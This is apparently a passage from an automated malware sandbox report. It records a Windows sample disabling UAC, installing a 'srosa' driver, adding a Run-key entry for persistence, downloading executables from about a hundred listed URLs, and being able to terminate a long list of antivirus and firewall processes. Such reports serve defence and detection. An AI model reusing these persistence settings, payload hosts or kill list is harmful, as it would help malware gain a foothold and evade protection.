- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\AFD
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\AppMgmt
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Base
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Boot Bus Extender
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Boot file system
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Browser
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\CryptSvc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\DcomLaunch
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Dhcp
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmadmin
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmboot.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmio.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmload.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmserver
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\DnsCache
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\EventLog
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\File system
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Filter
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\HelpSvc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ip6fw.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ipnat.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LanmanServer
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LanmanWorkstation
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LmHosts
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Messenger
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NDIS
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NDIS Wrapper
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Ndisuio
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBIOS
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBIOSGroup
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBT
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetDDEGroup
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Netlogon
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetMan
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Network
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetworkProvider
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\nm
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\nm.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NtLmSsp
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PCI Configuration
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PlugPlay
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PNP Filter
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PNP_TDI
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Primary disk
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpcdd.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpdd.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpwd.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdsessmgr
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\RpcSs
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SCSI Class
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\sermouse.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SharedAccess
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\sr.sys
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SRService
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Streams Drivers

The newly created Registry Values are:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
  - EnableLUA = 0x00000000
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center\Svc]
  - EnableLUA = 0x00000016
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000\Control]
  - *NewlyCreated* = 0x00000000
  - ActiveService = "srosa"
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000]
  - Service = "srosa"
  - Legacy = 0x00000001
  - ConfigFlags = 0x00000000
  - Class = "LegacyDriver"
  - ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  - DeviceDesc = "Megadrv3"
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA]
  - NextInstance = 0x00000001
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Enum]
  - 0 = "Root\LEGACY_SROSA\0000"
  - Count = 0x00000001
  - NextInstance = 0x00000001
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Security]
  - Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
- [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa]
  - Type = 0x00000001
  - Start = 0x00000001
  - ErrorControl = 0x00000000
  - ImagePath = "%System%\drivers\srosa.sys"
  - DisplayName = "Megadrv3"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000\Control]
  - *NewlyCreated* = 0x00000000
  - ActiveService = "srosa"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000]
  - Service = "srosa"
  - Legacy = 0x00000001
  - ConfigFlags = 0x00000000
  - Class = "LegacyDriver"
  - ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  - DeviceDesc = "Megadrv3"
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA]
  - NextInstance = 0x00000001
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Enum]
  - 0 = "Root\LEGACY_SROSA\0000"
  - Count = 0x00000001
  - NextInstance = 0x00000001
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Security]
  - Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
- [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa]
  - Type = 0x00000001
  - Start = 0x00000001
  - ErrorControl = 0x00000000
  - ImagePath = "%System%\drivers\srosa.sys"
  - DisplayName = "Megadrv3"
- [HKEY_CURRENT_USER\Software\FirstRRRun]
  - First12Ru123n = 0x00000001
- [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  - drvsyskit = "%System%\drivers\hldrrr.exe"
  so that hldrrr.exe runs every time Windows starts

The following Registry Values were deleted:
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
  - C:\Documents and Settings\UserName\Application Data\Microsoft\Installer\ = ""
  - C:\WINDOWS\Installer\{4275B162-C5C0-4912-9522-E92FE1C4E21D}\ = ""
  - C:\Documents and Settings\UserName\Application Data\Microsoft\Installer\{3966BA0C-23BA-4B20-9B9D-7561DEC54E6A}\ = ""
  - C:\Program Files\VMware\VMware Tools\Drivers\memctl\ = ""
  - C:\Program Files\VMware\VMware Tools\TPOG3\ = ""
  - C:\Program Files\VMware\VMware Tools\TPOG3\amd64\ = ""
  - C:\Program Files\VMware\VMware Tools\TPOG3\i386\ = ""
  - C:\Program Files\VMware\VMware Tools\vmci\ = ""
  - C:\WINDOWS\Installer\{3B410500-1802-488E-9EF1-4B11992E0440}\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ = "1"
  - C:\WINDOWS\Microsoft.NET\Framework\ = "1"
  - C:\WINDOWS\Microsoft.NET\ = "1"
  - C:\WINDOWS\PCHEALTH\ERRORREP\ = "1"
  - C:\WINDOWS\PCHEALTH\ERRORREP\QHEADLES\ = "1"
  - C:\WINDOWS\PCHEALTH\ERRORREP\QSIGNOFF\ = "1"
  - C:\WINDOWS\winsxs\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Images\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_GlobalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Code\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RedistList\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\Browsers\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Data\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v1.0.3705\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\App_LocalResources\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MSBuild\ = ""
  - C:\WINDOWS\system32\MUI\0409\ = ""
  - C:\Program Files\Internet Explorer\MUI\0409\ = ""
  - C:\Program Files\Internet Explorer\MUI\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MUI\0409\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MUI\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\App_LocalResources\ = ""
  - C:\WINDOWS\winsxs\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1025\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1028\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1031\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1033\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1036\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1040\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1041\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\1042\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\2052\ = ""
  - C:\Program Files\Common Files\Microsoft Shared\DW\3082\ = ""
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\ = ""
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls]
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\error.aspx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\App_LocalResources\createPermission.aspx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\App_LocalResources\providerList.ascx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_GlobalResources\AppConfigCommon.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\App_LocalResources\manageSingleRole.aspx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\App_LocalResources\setUpAuthentication.aspx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\editUser.aspx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardAddUser.ascx.resx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.EnterpriseServices.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Data\GroupedProviders.xml = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\navigationBar.ascx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\SmtpSettings.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Code\WebAdminPage.cs = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\WebAdminHelp.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Images\requiredBang.gif = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\managePermissions.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\ProviderList.ascx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\manageSingleRole.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\security.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\addUser.aspx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\wizardAddUser.ascx = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\alinkui.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\alink.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\dfdll.dll = 0x00000001
  - C:\WINDOWS\system32\dfshim.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Deployment.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\gacutil.exe.config = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\regsvcs.exe.config = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ieexec.exe.config = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe.config = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\cscompui.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cscompmgd.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cscomp.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cvtres.exe = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\CvtResUI.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.JScript.dll = 0x00000001
  - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft.JScript.tlb = 0x00000002

Other details

To mark the presence in the system, the following Mutex object was created:
- DBWinMutex

The following Host Name was requested from a host database:
- www.ru

The following Internet downloads were started (the retrieved bits are saved into the local file):

URL to be downloaded
Filename for the downloaded bits

http://www.courdesloges.com/files2.php
%System%\drivers\down\407265.exe

http://aytocristobal.com/files2.php
%System%\drivers\down\407312.exe

http://cuidatumiembro.com/files2.php
%System%\drivers\down\407328.exe

http://maneironsclimb.com/files2.php
%System%\drivers\down\407328.exe

http://www.etraining.ee/files2.php
%System%\drivers\down\407343.exe

http://dancefrequency.com.br/files2.php
%System%\drivers\down\407343.exe

http://darioo.altervista.org/files2.php
%System%\drivers\down\407359.exe

http://daruliftaa.com/files2.php
%System%\drivers\down\407406.exe

http://datalifecenter.com/files2.php
%System%\drivers\down\407421.exe

http://datissa.com/files2.php
%System%\drivers\down\407421.exe

http://www.dbmetric.com/files2.php
%System%\drivers\down\407421.exe

http://WWW.DDP.COM.PE/files2.php
%System%\drivers\down\407437.exe

http://www.debmark.com/files2.php
%System%\drivers\down\407437.exe

http://decastrogil.es/files2.php
%System%\drivers\down\407484.exe

http://delattres.com/files2.php
%System%\drivers\down\407484.exe

http://demianaiello.com.ar/files2.php
%System%\drivers\down\407500.exe

http://demo.portaltapejara.com/files2.php
%System%\drivers\down\407500.exe

http://derechoydemocracia.es/files2.php
%System%\drivers\down\407515.exe

http://www.devergo.com/files2.php
%System%\drivers\down\407531.exe

http://dezaete.nl/files2.php
%System%\drivers\down\407531.exe

http://dieppeseinemaritime.com/files2.php
%System%\drivers\down\407531.exe

http://digitalpicture.com/files2.php
%System%\drivers\down\407578.exe

http://digicromo.com/files2.php
%System%\drivers\down\407578.exe

http://diocesequebec.qc.ca/files2.php
%System%\drivers\down\407593.exe

http://divinaclub.com/files2.php
%System%\drivers\down\407593.exe

http://divinojocelyn.altervista.org/files2.php
%System%\drivers\down\407609.exe

http://dj-horoz.com/files2.php
%System%\drivers\down\407609.exe

http://djsoprano.cp.win.pl/files2.php
%System%\drivers\down\407609.exe

http://djthefox.com/files2.php
%System%\drivers\down\407625.exe

http://deniselinsconvites.com.br/files2.php
%System%\drivers\down\407687.exe

http://lotva.org/files2.php
%System%\drivers\down\407703.exe

http://oliwia.iskierka.org/files2.php
%System%\drivers\down\407703.exe

http://dospablos.es/files2.php
%System%\drivers\down\407703.exe

http://dponcemi.altervista.org/files2.php
%System%\drivers\down\407718.exe

http://drutplast.com.pl/files2.php
%System%\drivers\down\407765.exe

http://dudys.bx.pl/files2.php
%System%\drivers\down\407765.exe

http://dukedem.com/files2.php
%System%\drivers\down\407781.exe

http://dddesignstudio.com/files2.php
%System%\drivers\down\407796.exe

http://easylimo.es/files2.php
%System%\drivers\down\407828.exe

http://doctorlife.org/files2.php
%System%\drivers\down\407859.exe

http://eccesso.es/files2.php
%System%\drivers\down\407859.exe

http://ecobos.be/files2.php
%System%\drivers\down\407875.exe

http://www.edenvillage.it/files2.php
%System%\drivers\down\407875.exe

http://programaseducativos-salamanca.com/files2.php
%System%\drivers\down\407890.exe

http://www.ekogips.pl/files2.php
%System%\drivers\down\407890.exe

http://www.ekotap.pl/files2.php
%System%\drivers\down\407906.exe

http://elelfogris.com/files2.php
%System%\drivers\down\407906.exe

http://elemco.pl/files2.php
%System%\drivers\down\407906.exe

http://elitan.pl/files2.php
%System%\drivers\down\407953.exe

http://passecdl.co.uk/files2.php
%System%\drivers\down\407953.exe

http://www.elotron.com/files2.php
%System%\drivers\down\407968.exe

http://elpantalan.es/files2.php
%System%\drivers\down\407968.exe

http://industriascarnicaselrobledo.com/files2.php
%System%\drivers\down\407984.exe

http://www.enco-group.cz/files2.php
%System%\drivers\down\407984.exe

http://energiesport.com/files2.php
%System%\drivers\down\407984.exe

http://epamateohernandez.com/files2.php
%System%\drivers\down\408000.exe

http://eravamo100.altervista.org/files2.php
%System%\drivers\down\408000.exe

http://esf-ct.com/files2.php
%System%\drivers\down\408031.exe

http://espaciojoven.org/files2.php
%System%\drivers\down\408046.exe

http://www.espaceprojets-villejuif.fr/files2.php
%System%\drivers\down\408062.exe

http://www.eszterlancaruhaz.hu/files2.php
%System%\drivers\down\408062.exe

http://www.etalon-stroy.ru/files2.php
%System%\drivers\down\408062.exe

http://www.experiment.lv/files2.php
%System%\drivers\down\408078.exe

http://streetlions.com/files2.php
%System%\drivers\down\408078.exe

http://www.false-news.com/files2.php
%System%\drivers\down\408093.exe

http://falshpolcom.18.com1.ru/files2.php
%System%\drivers\down\408093.exe

http://www.concretosfamasa.com/files2.php
%System%\drivers\down\408140.exe

http://fermesdemarie.eolas-services.com/files2.php
%System%\drivers\down\408156.exe

http://fernandoaureliano.com/files2.php
%System%\drivers\down\408156.exe

http://fetems.org.br/files2.php
%System%\drivers\down\408171.exe

http://wolfsdonksport.be/files2.php
%System%\drivers\down\408171.exe

http://filibertovillalobosguijuelo.com/files2.php
%System%\drivers\down\408171.exe

http://finz-center.com/files2.php
%System%\drivers\down\408187.exe

http://www.fitdina.com/files2.php
%System%\drivers\down\408187.exe

http://fiveuk.fi.funpic.org/files2.php
%System%\drivers\down\408203.exe

http://flabs.net/files2.php
%System%\drivers\down\408234.exe

http://fomentocredito.es/files2.php
%System%\drivers\down\408234.exe

http://fortis-sf.home.pl/files2.php
%System%\drivers\down\408250.exe

http://fotoastur.com/files2.php
%System%\drivers\down\408250.exe

http://fouadovedia.com/files2.php
%System%\drivers\down\408250.exe

http://foxx.fan-sites.org/files2.php
%System%\drivers\down\408265.exe

http://frauen-ratgeber.com/files2.php
%System%\drivers\down\408265.exe

http://fritschiclean.ch/files2.php
%System%\drivers\down\408281.exe

http://www.kfzeintragsservice.de/files2.php
%System%\drivers\down\408281.exe

http://www.autometasuche.de./files2.php
%System%\drivers\down\408281.exe

http://www.s-w-services.co.uk/files2.php
%System%\drivers\down\408328.exe

http://www.bodis.at/files2.php
%System%\drivers\down\408343.exe

http://www.musikverein-grosswallstadt.de/files2.php
%System%\drivers\down\408343.exe

http://tripplexwelt.de/files2.php
%System%\drivers\down\408359.exe

http://www.weingut-giegerich.de/files2.php
%System%\drivers\down\408359.exe

http://www.tenbrink-online.de/files2.php
%System%\drivers\down\408375.exe

http://www.alphazip.com/files2.php
%System%\drivers\down\408375.exe

http://www.kayaks.cz/files2.php
%System%\drivers\down\408390.exe

http://galami.sk/files2.php
%System%\drivers\down\408406.exe

http://galateainteriorismo.com/files2.php
%System%\drivers\down\408421.exe

http://galixesol.com/files2.php
%System%\drivers\down\408437.exe

http://www.gan-psifas.co.il/files2.php
%System%\drivers\down\408437.exe

http://robertsandboles.co.nz/files2.php
%System%\drivers\down\408468.exe

http://gazetaszkolna.edu.pl/files2.php
%System%\drivers\down\408468.exe

http://gdri.si/files2.php
%System%\drivers\down\408484.exe

http://generation80.be/files2.php
%System%\drivers\down\408531.exe

Heuristics Analysis

Heuristically identified capability to terminate the following security related processes:

_avp32.exe
_avpcc.exe
_avpm.exe
ackwin32.exe
alertsvc.exe
alogserv.exe
anti-trojan.exe
antivirus.exe
ants.exe
apvxdwin.exe
armor2net.exe
atcon.exe
atupdater.exe
atwatch.exe
aupdate.exe
autodown.exe
autotrace.exe
autoupdate.exe
avconsol.exe
avengine.exe
avgcc32.exe
avgctrl.exe
avgnt.exe
avgserv.exe
avguard.exe
avgw.exe
avkserv.exe
avkservice.exe
avp.exe
avp32.exe
avpcc.exe
avpm.exe
avpupd.exe
avsched32.exe
avsynmgr.exe
avwupd32.exe
avwupsrv.exe
avxmonitor9x.exe
avxmonitornt.exe
avxquar.exe
blackd.exe
blackice.exe
ccapp.exe
ccevtmgr.exe
ccproxy.exe
cfiaudit.exe
claw95.exe
claw95cf.exe
cleaner.exe
cleaner3.exe
cmgrdian.exe
cpd.exe
defwatch.exe
doors.exe
drweb32w.exe
drwebupw.exe
escanh95.exe
escanhnt.exe
f-agnt95.exe
fameh32.exe
fast.exe
fch32.exe
firewall.exe
f-prot95.exe
frameworkservice.exe
frw.exe
fsav.exe
fsav32.exe
fsgk32.exe
fsm32.exe
fsma32.exe
fsmb32.exe
f-stopw.exe
guard.exe
iamapp.exe
iamserv.exe
icload95.exe
icloadnt.exe
icmon.exe
icssuppnt.exe
icsupp95.exe
icsuppnt.exe
iface.exe
iomon98.exe
isrv95.exe
jedi.exe
kavpf.exe
livesrv.exe
lockdown2000.exe
luall.exe
lucomserver.exe
luinit.exe
mcagent.exe
mcmnhdlr.exe
mcshield.exe
mcupdate.exe
mcvsshld.exe
minilog.exe
monitor.exe
moolive.exe
navapsvc.exe
navapw32.exe
navlu32.exe
navstub.exe
navw32.exe
navwnt.exe
ndd32.exe
neowatchlog.exe
nisum.exe
nmain.exe
nod32.exe
nod32krn.exe
normist.exe
notstart.exe
nprotect.exe
nsched32.exe
ntrtscan.exe
ntxconfig.exe
nupgrade.exe
nvc95.exe
nwservice.exe
outpost.exe
pavfires.exe
pavfnsvr.exe
pavproxy.exe
pavsrv51.exe
pcciomon.exe
pccntmon.exe
persfw.exe
pop3trap.exe
poproxy.exe
pxagent.exe
realmon.exe
rescue.exe
rtvscan.exe
rtvscn95.exe
rulaunch.exe
savscan.exe
scan32.exe
shstat.exe
smc.exe
sndsrvc.exe
sphinx.exe
spyxx.exe
ss3edit.exe
swnetsup.exe
symlcsvc.exe
symproxysvc.exe
taumon.exe
tc.exe
tca.exe
tcm.exe
tds-3.exe
tfak.exe
trjscan.exe
update.exe
updaterui.exe
vettray.exe
vptray.exe
vsecomr.exe
vshwin32.exe
